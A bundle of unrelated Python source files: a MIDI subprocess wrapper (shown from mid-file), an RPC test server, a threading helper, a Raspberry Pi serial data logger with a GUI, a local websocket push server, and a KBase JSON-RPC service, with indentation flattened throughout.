line = self.__proc.stderr.readline()
if line==b'': return
if self.__requires_monitor_stderr:
print(line.decode(),end='')
sys.stdout.flush();
def __keepalive_sender(self):
while not self.__sem_keepalive.acquire(True,1.0):
self.__proc.stdin.write(b'\xFF')
self.__proc.stdin.flush()
def _prepare(self):
self.__proc = subprocess.Popen(self.interMidiator, #'a:/dropbox/home/git/intermidiator/intermidiator.exe',
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
s_ready = self.__proc.stdout.readline();
if s_ready == b'READY\r\n' : self.__crlf, self.__terminator = True, b'\r\n'
elif s_ready == b'READY\n' : self.__crlf, self.__terminator = False, b'\n'
else:
print('ERROR!')
return False
#__monitor_stdout, __monitor_stderr = self.generate_monitors();
self.__sem_1 = threading.Semaphore(0)
self.__sem_2 = threading.Semaphore(0)
self.__sem_keepalive = threading.Semaphore(0)
self.__thread_monitor_stdout = threading.Thread(target=self.__monitor_stdout)
self.__thread_monitor_stderr = threading.Thread(target=self.__monitor_stderr)
self.__thread_keepalive_sender = threading.Thread(target=self.__keepalive_sender)
self.__thread_keepalive_sender.start()
self.__callback_dic = {}
return True
def _start(self):
self.__thread_monitor_stdout.start()
self.__thread_monitor_stderr.start()
def start_process(self):
self._prepare()
self._start()
def debug(self, state:bool):
self.__proc.stdin.write(b'DEBUG ')
self.__proc.stdin.write(b'ON' if state else b'OFF')
self.__proc.stdin.write(self.__terminator)
def __enum_io(self,cmd):
self.__proc.stdin.write(cmd)
self.__proc.stdin.write(self.__terminator)
self.__proc.stdin.flush()
self.__sem_1.acquire()
names = self.__gResult;
self.__sem_2.release()
return names
def enum_input(self):
return self.__enum_io(b'LIST INPUT')
def enum_output(self):
return self.__enum_io(b'LIST OUTPUT')
def __open_io(self, index, name, candidates, cmdHeader, enumerator, dev_ctor):
if index and not isinstance(index, int): raise(ValueError)
if name and not isinstance(name, str): raise(ValueError)
if candidates and not isinstance(candidates,list) and not isinstance(candidates,tuple):
raise(ValueError)
if (index,name,candidates).count(None) != 2: raise(ValueError)
if name:
devNames = enumerator()
index = devNames.index(name)
elif candidates:
devNames = enumerator()
for c in candidates:
if c in devNames:
index = devNames.index(c)
break
if not index: raise(Exception('device name not found'))
wr = self.__proc.stdin.write
wr(cmdHeader)
wr(b'%X' % index)
wr(self.__terminator)
self.__proc.stdin.flush()
self.__sem_1.acquire()
hexstr = self.__gResult;
self.__sem_2.release()
handle = int_from_hex3(hexstr[0],hexstr[1],hexstr[2])
#print(handle)
return dev_ctor(handle)
def open_input(self,*, index=None, name=None, candidates=None, translate=None):
if not translate:
cmd = b'OPEN INPUT '
elif translate == 8:
cmd = b'OPEN INPUT8T '
elif translate == 9:
cmd = b'OPEN INPUT9T '
else: raise(ValueError)
return self.__open_io(index, name, candidates, cmd,
self.enum_input, MidiInDevice)
def open_output(self,*, index=None, name=None, candidates=None):
return self.__open_io(index,name,candidates,b'OPEN OUTPUT ',
self.enum_output, MidiOutDevice)
def close(self, dev):
if isinstance(dev, MidiInDevice):
body = b'INPUT %X' % dev.handle
elif isinstance(dev, MidiOutDevice):
body = b'OUTPUT %X' % dev.handle
else:
raise(ValueError)
self.__proc.stdin.write(b'CLOSE ')
self.__proc.stdin.write(body)
self.__proc.stdin.write(self.__terminator)
self.__proc.stdin.flush()
def listen(self, dev):
if not isinstance(dev, MidiInDevice): raise(ValueError)
self.__proc.stdin.write(b'LISTEN ')
self.__proc.stdin.write(b'%X' % dev.handle)
self.__proc.stdin.write(self.__terminator)
self.__proc.stdin.flush()
def send(self, dev, msg):
if not isinstance(dev, MidiOutDevice): raise(ValueError)
if isinstance(msg,str): msg = msg.encode()
elif not isinstance(msg, bytes): raise(ValueError)
wr = self.__proc.stdin.write
wr(b'SEND ')
wr(b'%X ' % dev.handle)
wr(msg)
wr(self.__terminator)
self.__proc.stdin.flush()
__current_callback_id = 100
def __generate_callback_id(self):
self.__current_callback_id += 1
return self.__current_callback_id
def register_callback(self, target, signal_pattern, function):
self.callback(target, signal_pattern, function)
def callback(self, target, signal_pattern, function):
self.__proc.stdin.write(b'CALLBACK ')
if target is None or target == '*': self.__proc.stdin.write(b'* ')
elif not isinstance(target, MidiInDevice): raise(ValueError)
else: self.__proc.stdin.write(b'%X ' % target.handle)
if not isinstance(signal_pattern, bytes):
signal_pattern = signal_pattern.encode()
self.__proc.stdin.write(signal_pattern)
self.__proc.stdin.write(b' ')
id = self.__generate_callback_id()
self.__callback_dic[id] = function
self.__proc.stdin.write(b'%d' % id)
self.__proc.stdin.write(self.__terminator)
self.__proc.stdin.flush()
def sync(self):
wr = self.__proc.stdin.write
wr(b'ECHO SYNC')
wr(self.__terminator)
self.__proc.stdin.flush()
self.__sem_1.acquire()
s = self.__gResult;
self.__sem_2.release()
if b'SYNC' != s:
raise(Exception('Midiator cannot synchronize'))
def _terminate(self):
self.__sem_keepalive.release()
self.__thread_keepalive_sender.join()
wr = self.__proc.stdin.write
wr(b'QUIT')
wr(self.__terminator)
self.__proc.stdin.flush()
self.__thread_monitor_stdout.join()
self.__thread_monitor_stderr.join()
def stop_process(self):
self.sync()
self._terminate()
def _unsafe_communicate(self, bs):
self.__proc.stdin.write(bs);
self.__proc.stdin.write(self.__terminator);
self.__proc.stdin.flush();
###
MTC = 'mtc'
SONG_POS = 'songpos'
SONG = 'song'
TUNE_REQ = 'tunereq'
EOX = 'eox'
CLOCK = 'clock'
START = 'start'
CONTINUE = 'continue'
STOP = 'stop'
ACTIVE = 'active'
RESET = 'reset'
NOTEOFF = 'noteoff'
NOTEON = 'noteon'
KEYPRESS = 'keypress'
CONTROL = 'control'
PROGRAM = 'program'
PRESSURE = 'pressure'
BEND = 'bend'
def signal_type(signal):
h = signal[0]
if h == 'F':
return {'1':MTC,'2':SONG_POS,'3':SONG,'6':TUNE_REQ,
'7':EOX,'8':CLOCK,'A':START,'B':CONTINUE,
'C':STOP,'E':ACTIVE,'F':RESET}[signal[1]]
else:
return {'8':NOTEOFF, '9':NOTEON, 'A':KEYPRESS, 'B':CONTROL,
'C':PROGRAM, 'D':PRESSURE, 'E':BEND}[h]
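# Illustrative sketch (added): signal_type classifies a hex-encoded message by its status
# nibble (or by the second nibble for 0xFx system messages), e.g.:
#
#     signal_type('903C40')   # -> 'noteon'
#     signal_type('F8')       # -> 'clock'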
|
server.py
|
# encoding=utf-8
import sys
sys.path.append("../../..")
from simplerpc.rpcserver import RpcServer
from simplerpc.simplerpc import dispatcher, AsyncResponse
import time
@dispatcher.add_method
def foobar(**kwargs):
return kwargs["foo"] + kwargs["bar"]
@dispatcher.add_method
def make_error(*args):
raise
@dispatcher.add_method
def delayecho(*args):
r = AsyncResponse()
from threading import Thread
def func(r):
time.sleep(5)
r.result(args)
Thread(target=func, args=(r,)).start()
return r
@dispatcher.add_method
def delayerror(*args):
r = AsyncResponse()
from threading import Thread
def func(r):
time.sleep(5)
r.error(RuntimeError("something wrong here"))
Thread(target=func, args=(r,)).start()
return r
def test_with_tcp():
from simplerpc.transport.tcp import TcpServer
s = RpcServer(TcpServer())
s.run()
# s.console_run({"s": s})
def test_with_sszmq():
from simplerpc.transport.sszmq import SSZmqServer
s = RpcServer(SSZmqServer())
s.run()
if __name__ == '__main__':
test_with_tcp()
# test_with_sszmq()
|
threads.py
|
__author__ = "Altertech Group, http://www.altertech.com/"
__copyright__ = "Copyright (C) 2018-2019 Altertech Group"
__license__ = "Apache License 2.0"
__version__ = "0.2.7"
import threading
from functools import wraps
from pyaltt import task_supervisor
from pyaltt import TASK_NORMAL
class LocalProxy(threading.local):
def get(self, attr, default=None):
return getattr(self, attr, default)
def has(self, attr):
return hasattr(self, attr)
def set(self, attr, value):
return setattr(self, attr, value)
def clear(self, attr):
return delattr(self, attr) if hasattr(self, attr) else True
def background_task(f, *args, **kwargs):
@wraps(f)
def start_thread(*args, **kw):
t = threading.Thread(
group=kwargs.get('group'),
target=f,
name=kwargs.get('name'),
args=args,
kwargs=kw)
if kwargs.get('daemon'): t.setDaemon(True)
starter = threading.Thread(
target=_background_task_starter,
args=(t, kwargs.get('priority', TASK_NORMAL)))
starter.setDaemon(True)
starter.start()
if kwargs.get('wait_start'):
starter.join()
return t
return start_thread
def _background_task_starter(t, priority):
if task_supervisor.acquire(t, priority):
t.start()
releaser = threading.Thread(target=_background_task_releaser, args=(t,))
releaser.setDaemon(True)
releaser.start()
def _background_task_releaser(t):
t.join()
task_supervisor.release(t)
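# Illustrative usage sketch (added, not part of the original module). The factory is
# assumed to be applied to a plain function and the returned starter called with that
# function's own arguments; supervision behaviour depends on pyaltt.task_supervisor:
#
#     def worker(job_id):
#         print('processing', job_id)
#
#     start_worker = background_task(worker, name='worker', daemon=True, wait_start=True)
#     t = start_worker(42)   # returns the threading.Thread running worker(42)
#     t.join()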
|
OB_tkwindowv4.py
|
from OB_classesv3 import On_Box_Window
import time
from Decoder import *
from threading import Thread
import serial.tools.list_ports
#import glances_sub
from glances_sub import system_specs
import watchdog
import os
import datetime as dt
ser = serial.Serial("/dev/ttyACM0",9600)
ser.flush()
parser = binaryPacketParser()
#First time running the Decoder will give empty packets, so throw those away immediately.
IMU_packets = parser.parseBytes(ser.read(88))
aud_packets = parser.parseBytes(ser.read(1078))
def packet_len_time_check(IMUpack, audpack,starttime):
if len(IMUpack) == 2 or len(audpack) == 2:
gui.notworking()
print("EMPTY PACKETS")
return
# elif(csvFile.closed):
# gui.notworking()
# return
else:
timestamp_post = dt.datetime.now()
print("Timestamp_post: " + str(timestamp_post))
time_diff = timestamp_post - starttime
# print("Timestamp: " + str(starttime))
print("TIME DIFFERENCE:" + str(time_diff))
if (time_diff.total_seconds() > 8):
print("ERROR ERROR ERROR ERROR ERROR")
# print(time_diff.total_seconds())
gui.notworking()
return
def data_management(window):
while(True):
t_end = time.time() + 86400
now = dt.datetime.now().strftime('%Y-%m-%d-%M-%S')
csvname = 'IMUaudio'+ now + '.csv'
with open(csvname,'w') as csvFile:
while time.time() < t_end:
timestamp = dt.datetime.now()
print("Start of loop stamp: " + str(timestamp))
csvFile.write(str(timestamp)+'\n')
try:
IMU_packets = parser.parseBytes(ser.read(88))
csvFile.write(str(IMU_packets)+'\n\n')
aud_packets = parser.parseBytes(ser.read(1078))
csvFile.write(str(aud_packets)+'\n\n')
window.root.after(100, packet_len_time_check,IMU_packets,aud_packets, timestamp)
except serial.SerialException:
window.notworking()
print("ERRRRORRR")
return None
dogqueue = watchdog.q
#def main():
gui = On_Box_Window()
gui.start()
gui.PIvideo_stream(dogqueue)
RPi = system_specs()
system_thread = Thread(target=RPi.check_all,args=[gui])
system_thread.start()
data_thread = Thread(target=data_management,args=[gui])
data_thread.start()
watchdog_thread = Thread(target=watchdog.grabqueueitem, args=[gui])  # renamed so the watchdog module is not shadowed
watchdog_thread.start()
gui.mainloop()
comm = "python3 allmightydog.py"
os.system(comm)
#if __name__ == "__main__":
# main()
|
simple_pusher.py
|
"""A really dump pusher 'clone', for use in testing and running locally."""
import argparse
import collections
import json
import logging
import SimpleHTTPServer
import SocketServer
import sys
import threading
import time
import SimpleWebSocketServer
HTTP_PORT = 8101
WEBSOCKET_PORT = 8102
LOGFMT = '%(asctime)s %(levelname)s %(filename)s:%(lineno)d - %(message)s'
class SocketHandler(SimpleWebSocketServer.WebSocket):
"""Represents a websocket connection."""
# pylint: disable=invalid-name
def __init__(self, sockets, server, sock, address):
super(SocketHandler, self).__init__(server, sock, address)
self._sockets = sockets
self._channels = []
def handleMessage(self):
"""Only message we get is a subscription."""
if self.data is None:
return
try:
# message should be a subscription, of form {channel: 'channel_name'}
logging.info('\'%s\' received', self.data)
data = json.loads(self.data.decode('utf-8'))
self._channels.append(data['channel'])
self._sockets[data['channel']].append(self)
except:
logging.error('Error handling message:', exc_info=sys.exc_info())
def handleConnected(self):
logging.info('%s connected', self.address)
def handleClose(self):
logging.info('%s closed', self.address, exc_info=sys.exc_info())
for channel in self._channels:
self._sockets[channel].remove(self)
class ServerHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
"""Represents a http requests."""
# pylint: disable=invalid-name,too-many-public-methods
def __init__(self, sockets, request, client_address, server):
self._sockets = sockets
SimpleHTTPServer.SimpleHTTPRequestHandler.__init__(
self, request, client_address, server)
def do_POST(self):
"""Send request body to /channel."""
try:
channel = self.path.split('/')[-1]
content_len = int(self.headers.getheader('content-length', 0))
post_body = self.rfile.read(content_len)
#logging.info('Sending \"%s\" to \"%s\"', post_body, channel)
for socket in self._sockets[channel]:
socket.sendMessage(post_body)
self.send_response(204, '')
except:
logging.error('Error sending message:', exc_info=sys.exc_info())
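# Illustrative sketch (added): the two handlers above are the whole protocol - a websocket
# client subscribes by sending a JSON channel name, and anything POSTed to /<channel> over
# HTTP is fanned out to the subscribers of that channel. Hypothetical client side:
#
#     # subscribe over the websocket:   ws.send(json.dumps({'channel': 'events'}))
#     # publish over HTTP:              curl -X POST -d '{"msg": "hi"}' http://localhost:8101/events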
class SimplePusher(object):
"""A very simple websocket / push service."""
def __init__(self, args):
self._args = args
self._sockets = collections.defaultdict(list)
self._httpd = None
self._httpd_thread = None
self._websocket_server = None
self._websocket_server_thread = None
def _http_request_handler(self, request, client_address, server):
return ServerHandler(self._sockets, request, client_address, server)
def _websocket_request_handler(self, server, sock, addr):
return SocketHandler(self._sockets, server, sock, addr)
def start(self):
"""Start this."""
logging.info('Starting local websocket server.')
self._httpd = SocketServer.TCPServer(
('', self._args.http_port), self._http_request_handler)
self._httpd_thread = threading.Thread(target=self._httpd.serve_forever)
self._httpd_thread.start()
self._websocket_server = SimpleWebSocketServer.SimpleWebSocketServer(
'', self._args.websocket_port, self._websocket_request_handler)
self._websocket_server_thread = threading.Thread(
target=self._websocket_server.serveforever)
self._websocket_server_thread.start()
def stop(self):
"""Stop this."""
logging.info('Stopping local websocket server.')
self._httpd.shutdown()
self._httpd_thread.join()
self._websocket_server.close()
self._websocket_server_thread.join()
def main():
logging.basicConfig(format=LOGFMT, level=logging.DEBUG)
parser = argparse.ArgumentParser()
parser.add_argument('--http_port',
default=HTTP_PORT)
parser.add_argument('--websocket_port',
default=WEBSOCKET_PORT)
args = parser.parse_args()
pusher = SimplePusher(args)
pusher.start()
try:
while True:
time.sleep(100)
except:
pass
pusher.stop()
if __name__ == '__main__':
main()
|
kb_virsorter2Server.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import datetime
import json
import os
import random as _random
import sys
import traceback
from getopt import getopt, GetoptError
from multiprocessing import Process
from os import environ
from wsgiref.simple_server import make_server
import requests as _requests
from jsonrpcbase import JSONRPCService, InvalidParamsError, KeywordError, \
JSONRPCError, InvalidRequestError
from jsonrpcbase import ServerError as JSONServerError
from biokbase import log
from kb_virsorter2.authclient import KBaseAuth as _KBaseAuth
try:
from ConfigParser import ConfigParser
except ImportError:
from configparser import ConfigParser
DEPLOY = 'KB_DEPLOYMENT_CONFIG'
SERVICE = 'KB_SERVICE_NAME'
AUTH = 'auth-service-url'
# Note that the error fields do not match the 2.0 JSONRPC spec
def get_config_file():
return environ.get(DEPLOY, None)
def get_service_name():
return environ.get(SERVICE, None)
def get_config():
if not get_config_file():
return None
retconfig = {}
config = ConfigParser()
config.read(get_config_file())
for nameval in config.items(get_service_name() or 'kb_virsorter2'):
retconfig[nameval[0]] = nameval[1]
return retconfig
config = get_config()
from kb_virsorter2.kb_virsorter2Impl import kb_virsorter2 # noqa @IgnorePep8
impl_kb_virsorter2 = kb_virsorter2(config)
class JSONObjectEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, set):
return list(obj)
if isinstance(obj, frozenset):
return list(obj)
if hasattr(obj, 'toJSONable'):
return obj.toJSONable()
return json.JSONEncoder.default(self, obj)
class JSONRPCServiceCustom(JSONRPCService):
def call(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in a JSON
string or None if there is none.
Arguments:
jsondata -- remote method call in jsonrpc format
"""
result = self.call_py(ctx, jsondata)
if result is not None:
return json.dumps(result, cls=JSONObjectEncoder)
return None
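# Illustrative sketch (added): `call` receives the already-deserialized JSON-RPC 1.1
# request built by the surrounding WSGI code; the method name below is hypothetical:
#
#     {
#         "version": "1.1",
#         "id": "12345",
#         "method": "kb_virsorter2.run_kb_virsorter2",
#         "params": [{"workspace_name": "my_workspace"}]
#     }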
def _call_method(self, ctx, request):
"""Calls given method with given params and returns it value."""
method = self.method_data[request['method']]['method']
params = request['params']
result = None
try:
if isinstance(params, list):
# Does it have enough arguments?
if len(params) < self._man_args(method) - 1:
raise InvalidParamsError('not enough arguments')
# Does it have too many arguments?
if(not self._vargs(method) and len(params) >
self._max_args(method) - 1):
raise InvalidParamsError('too many arguments')
result = method(ctx, *params)
elif isinstance(params, dict):
# Do not accept keyword arguments if the jsonrpc version is
# not >=1.1.
if request['jsonrpc'] < 11:
raise KeywordError
result = method(ctx, **params)
else: # No params
result = method(ctx)
except JSONRPCError:
raise
except Exception as e:
# log.exception('method %s threw an exception' % request['method'])
# Exception was raised inside the method.
newerr = JSONServerError()
newerr.trace = traceback.format_exc()
if len(e.args) == 1:
newerr.data = repr(e.args[0])
else:
newerr.data = repr(e.args)
raise newerr
return result
def call_py(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in python
object format or None if there is none.
This method is same as call() except the return value is a python
object instead of JSON string. This method is mainly only useful for
debugging purposes.
"""
rdata = jsondata
# we already deserialize the json string earlier in the server code, no
# need to do it again
# try:
# rdata = json.loads(jsondata)
# except ValueError:
# raise ParseError
# set some default values for error handling
request = self._get_default_vals()
if isinstance(rdata, dict) and rdata:
# It's a single request.
self._fill_request(request, rdata)
respond = self._handle_request(ctx, request)
# Don't respond to notifications
if respond is None:
return None
return respond
elif isinstance(rdata, list) and rdata:
# It's a batch.
requests = []
responds = []
for rdata_ in rdata:
# set some default values for error handling
request_ = self._get_default_vals()
self._fill_request(request_, rdata_)
requests.append(request_)
for request_ in requests:
respond = self._handle_request(ctx, request_)
# Don't respond to notifications
if respond is not None:
responds.append(respond)
if responds:
return responds
# Nothing to respond.
return None
else:
# empty dict, list or wrong type
raise InvalidRequestError
def _handle_request(self, ctx, request):
"""Handles given request and returns its response."""
if 'types' in self.method_data[request['method']]:
self._validate_params_types(request['method'], request['params'])
result = self._call_method(ctx, request)
# Do not respond to notifications.
if request['id'] is None:
return None
respond = {}
self._fill_ver(request['jsonrpc'], respond)
respond['result'] = result
respond['id'] = request['id']
return respond
class MethodContext(dict):
def __init__(self, logger):
self['client_ip'] = None
self['user_id'] = None
self['authenticated'] = None
self['token'] = None
self['module'] = None
self['method'] = None
self['call_id'] = None
self['rpc_context'] = None
self['provenance'] = None
self._debug_levels = set([7, 8, 9, 'DEBUG', 'DEBUG2', 'DEBUG3'])
self._logger = logger
def log_err(self, message):
self._log(log.ERR, message)
def log_info(self, message):
self._log(log.INFO, message)
def log_debug(self, message, level=1):
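        # Levels already in _debug_levels (7-9 or the DEBUG* names) pass straight
        # through; otherwise the level must be an int 1-3, which is mapped to 7-9.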
if level in self._debug_levels:
pass
else:
level = int(level)
if level < 1 or level > 3:
raise ValueError("Illegal log level: " + str(level))
level = level + 6
self._log(level, message)
def set_log_level(self, level):
self._logger.set_log_level(level)
def get_log_level(self):
return self._logger.get_log_level()
def clear_log_level(self):
self._logger.clear_user_log_level()
def _log(self, level, message):
self._logger.log_message(level, message, self['client_ip'],
self['user_id'], self['module'],
self['method'], self['call_id'])
def provenance(self):
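        # If a callback server is configured (SDK_CALLBACK_URL), fetch provenance
        # from it via a JSON-RPC 1.1 call; otherwise fall back to the provenance
        # already stored on this context.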
callbackURL = os.environ.get('SDK_CALLBACK_URL')
if callbackURL:
# OK, there's a callback server from which we can get provenance
arg_hash = {'method': 'CallbackServer.get_provenance',
'params': [],
'version': '1.1',
'id': str(_random.random())[2:]
}
body = json.dumps(arg_hash)
response = _requests.post(callbackURL, data=body,
timeout=60)
response.encoding = 'utf-8'
if response.status_code == 500:
if ('content-type' in response.headers and
response.headers['content-type'] ==
'application/json'):
err = response.json()
if 'error' in err:
raise ServerError(**err['error'])
else:
raise ServerError('Unknown', 0, response.text)
else:
raise ServerError('Unknown', 0, response.text)
if not response.ok:
response.raise_for_status()
resp = response.json()
if 'result' not in resp:
raise ServerError('Unknown', 0,
'An unknown server error occurred')
return resp['result'][0]
else:
return self.get('provenance')
class ServerError(Exception):
'''
The call returned an error. Fields:
name - the name of the error.
code - the error code.
message - a human readable error message.
data - the server side stacktrace.
'''
def __init__(self, name, code, message, data=None, error=None):
        super(ServerError, self).__init__(message)
self.name = name
self.code = code
self.message = message if message else ''
self.data = data or error or ''
# data = JSON RPC 2.0, error = 1.1
def __str__(self):
return self.name + ': ' + str(self.code) + '. ' + self.message + \
'\n' + self.data
def getIPAddress(environ):
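    # Prefer the proxy headers X-Forwarded-For / X-Real-IP over REMOTE_ADDR
    # unless the config sets dont_trust_x_ip_headers to 'true'.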
xFF = environ.get('HTTP_X_FORWARDED_FOR')
realIP = environ.get('HTTP_X_REAL_IP')
trustXHeaders = config is None or \
config.get('dont_trust_x_ip_headers') != 'true'
if (trustXHeaders):
if (xFF):
return xFF.split(',')[0].strip()
if (realIP):
return realIP.strip()
return environ.get('REMOTE_ADDR')
class Application(object):
# Wrap the wsgi handler in a class definition so that we can
# do some initialization and avoid regenerating stuff over
# and over
def logcallback(self):
self.serverlog.set_log_file(self.userlog.get_log_file())
def log(self, level, context, message):
self.serverlog.log_message(level, message, context['client_ip'],
context['user_id'], context['module'],
context['method'], context['call_id'])
def __init__(self):
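        # Set up the user and server loggers, register the RPC methods exposed by
        # the implementation, and record which of them require authentication.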
submod = get_service_name() or 'kb_virsorter2'
self.userlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, changecallback=self.logcallback,
config=get_config_file())
self.serverlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, logfile=self.userlog.get_log_file())
self.serverlog.set_log_level(6)
self.rpc_service = JSONRPCServiceCustom()
self.method_authentication = dict()
self.rpc_service.add(impl_kb_virsorter2.run_kb_virsorter2,
name='kb_virsorter2.run_kb_virsorter2',
types=[dict])
self.method_authentication['kb_virsorter2.run_kb_virsorter2'] = 'required' # noqa
self.rpc_service.add(impl_kb_virsorter2.status,
name='kb_virsorter2.status',
types=[dict])
authurl = config.get(AUTH) if config else None
self.auth_client = _KBaseAuth(authurl)
def __call__(self, environ, start_response):
# Context object, equivalent to the perl impl CallContext
ctx = MethodContext(self.userlog)
ctx['client_ip'] = getIPAddress(environ)
status = '500 Internal Server Error'
try:
body_size = int(environ.get('CONTENT_LENGTH', 0))
except (ValueError):
body_size = 0
if environ['REQUEST_METHOD'] == 'OPTIONS':
# we basically do nothing and just return headers
status = '200 OK'
rpc_result = ""
else:
request_body = environ['wsgi.input'].read(body_size)
try:
req = json.loads(request_body)
except ValueError as ve:
err = {'error': {'code': -32700,
'name': "Parse error",
'message': str(ve),
}
}
rpc_result = self.process_error(err, ctx, {'version': '1.1'})
else:
ctx['module'], ctx['method'] = req['method'].split('.')
ctx['call_id'] = req['id']
ctx['rpc_context'] = {
'call_stack': [{'time': self.now_in_utc(),
'method': req['method']}
]
}
prov_action = {'service': ctx['module'],
'method': ctx['method'],
'method_params': req['params']
}
ctx['provenance'] = [prov_action]
try:
token = environ.get('HTTP_AUTHORIZATION')
# parse out the method being requested and check if it
# has an authentication requirement
method_name = req['method']
auth_req = self.method_authentication.get(
method_name, 'none')
if auth_req != 'none':
if token is None and auth_req == 'required':
err = JSONServerError()
err.data = (
'Authentication required for ' +
'kb_virsorter2 ' +
'but no authentication header was passed')
raise err
elif token is None and auth_req == 'optional':
pass
else:
try:
user = self.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
except Exception as e:
if auth_req == 'required':
err = JSONServerError()
err.data = \
"Token validation failed: %s" % e
raise err
if (environ.get('HTTP_X_FORWARDED_FOR')):
self.log(log.INFO, ctx, 'X-Forwarded-For: ' +
environ.get('HTTP_X_FORWARDED_FOR'))
self.log(log.INFO, ctx, 'start method')
rpc_result = self.rpc_service.call(ctx, req)
self.log(log.INFO, ctx, 'end method')
status = '200 OK'
except JSONRPCError as jre:
err = {'error': {'code': jre.code,
'name': jre.message,
'message': jre.data
}
}
trace = jre.trace if hasattr(jre, 'trace') else None
rpc_result = self.process_error(err, ctx, req, trace)
except Exception:
err = {'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error ' +
'occurred',
}
}
rpc_result = self.process_error(err, ctx, req,
traceback.format_exc())
# print('Request method was %s\n' % environ['REQUEST_METHOD'])
# print('Environment dictionary is:\n%s\n' % pprint.pformat(environ))
# print('Request body was: %s' % request_body)
# print('Result from the method call is:\n%s\n' % \
# pprint.pformat(rpc_result))
if rpc_result:
response_body = rpc_result
else:
response_body = ''
response_headers = [
('Access-Control-Allow-Origin', '*'),
('Access-Control-Allow-Headers', environ.get(
'HTTP_ACCESS_CONTROL_REQUEST_HEADERS', 'authorization')),
('content-type', 'application/json'),
('content-length', str(len(response_body)))]
start_response(status, response_headers)
return [response_body.encode('utf8')]
def process_error(self, error, context, request, trace=None):
if trace:
self.log(log.ERR, context, trace.split('\n')[0:-1])
if 'id' in request:
error['id'] = request['id']
if 'version' in request:
error['version'] = request['version']
e = error['error'].get('error')
if not e:
error['error']['error'] = trace
elif 'jsonrpc' in request:
error['jsonrpc'] = request['jsonrpc']
error['error']['data'] = trace
else:
error['version'] = '1.0'
error['error']['error'] = trace
return json.dumps(error)
def now_in_utc(self):
# noqa Taken from http://stackoverflow.com/questions/3401428/how-to-get-an-isoformat-datetime-string-including-the-default-timezone @IgnorePep8
dtnow = datetime.datetime.now()
dtutcnow = datetime.datetime.utcnow()
delta = dtnow - dtutcnow
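        # Convert the local-vs-UTC delta into a signed hour/minute offset; the
        # +30 rounds the total seconds to the nearest whole minute.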
hh, mm = divmod((delta.days * 24 * 60 * 60 + delta.seconds + 30) // 60,
60)
return "%s%+02d:%02d" % (dtnow.isoformat(), hh, mm)
application = Application()
# This is the uwsgi application dictionary. On startup uwsgi will look
# for this dict and pull its configuration from here.
# This simply lists where to "mount" the application in the URL path
#
# This uwsgi module "magically" appears when running the app within
# uwsgi and is not available otherwise, so wrap an exception handler
# around it
#
# To run this server in uwsgi with 4 workers listening on port 9999 use:
# uwsgi -M -p 4 --http :9999 --wsgi-file _this_file_
# To run using the single-threaded Python BaseHTTP server listening on
# port 9999 (the default), execute this file directly
#
try:
import uwsgi
# Before we do anything with the application, see if the
# configs specify patching all std routines to be asynch
# *ONLY* use this if you are going to wrap the service in
# a wsgi container that has enabled gevent, such as
# uwsgi with the --gevent option
if config is not None and config.get('gevent_monkeypatch_all', False):
print("Monkeypatching std libraries for async")
from gevent import monkey
monkey.patch_all()
uwsgi.applications = {'': application}
except ImportError:
# Not available outside of wsgi, ignore
pass
_proc = None
def start_server(host='localhost', port=0, newprocess=False):
'''
By default, will start the server on localhost on a system assigned port
    in the main thread. Execution of the main thread will stay in the server
main loop until interrupted. To run the server in a separate process, and
thus allow the stop_server method to be called, set newprocess = True. This
will also allow returning of the port number.'''
global _proc
if _proc:
raise RuntimeError('server is already running')
httpd = make_server(host, port, application)
port = httpd.server_address[1]
print("Listening on port %s" % port)
if newprocess:
_proc = Process(target=httpd.serve_forever)
_proc.daemon = True
_proc.start()
else:
httpd.serve_forever()
return port
def stop_server():
global _proc
_proc.terminate()
_proc = None
def process_async_cli(input_file_path, output_file_path, token):
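    # Execute a single JSON-RPC request read from input_file_path and write the
    # (possibly error) response to output_file_path; returns 500 as the exit
    # code when the response contains an error, 0 otherwise.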
exit_code = 0
with open(input_file_path) as data_file:
req = json.load(data_file)
if 'version' not in req:
req['version'] = '1.1'
if 'id' not in req:
req['id'] = str(_random.random())[2:]
ctx = MethodContext(application.userlog)
if token:
user = application.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
if 'context' in req:
ctx['rpc_context'] = req['context']
ctx['CLI'] = 1
ctx['module'], ctx['method'] = req['method'].split('.')
prov_action = {'service': ctx['module'], 'method': ctx['method'],
'method_params': req['params']}
ctx['provenance'] = [prov_action]
resp = None
try:
resp = application.rpc_service.call_py(ctx, req)
except JSONRPCError as jre:
trace = jre.trace if hasattr(jre, 'trace') else None
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': jre.code,
'name': jre.message,
'message': jre.data,
'error': trace}
}
except Exception:
trace = traceback.format_exc()
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error occurred',
'error': trace}
}
if 'error' in resp:
exit_code = 500
with open(output_file_path, "w") as f:
f.write(json.dumps(resp, cls=JSONObjectEncoder))
return exit_code
if __name__ == "__main__":
if (len(sys.argv) >= 3 and len(sys.argv) <= 4 and
os.path.isfile(sys.argv[1])):
token = None
if len(sys.argv) == 4:
if os.path.isfile(sys.argv[3]):
with open(sys.argv[3]) as token_file:
token = token_file.read()
else:
token = sys.argv[3]
sys.exit(process_async_cli(sys.argv[1], sys.argv[2], token))
try:
opts, args = getopt(sys.argv[1:], "", ["port=", "host="])
except GetoptError as err:
# print help information and exit:
print(str(err)) # will print something like "option -a not recognized"
sys.exit(2)
port = 9999
host = 'localhost'
for o, a in opts:
if o == '--port':
port = int(a)
elif o == '--host':
host = a
print("Host set to %s" % host)
else:
assert False, "unhandled option"
start_server(host=host, port=port)
# print("Listening on port %s" % port)
# httpd = make_server( host, port, application)
#
# httpd.serve_forever()
|
__main__.py
|
#!/usr/bin/env python3
#
# MIT License
#
# (C) Copyright 2019-2022 Hewlett Packard Enterprise Development LP
#
# Permission is hereby granted, free of charge, to any person obtaining a
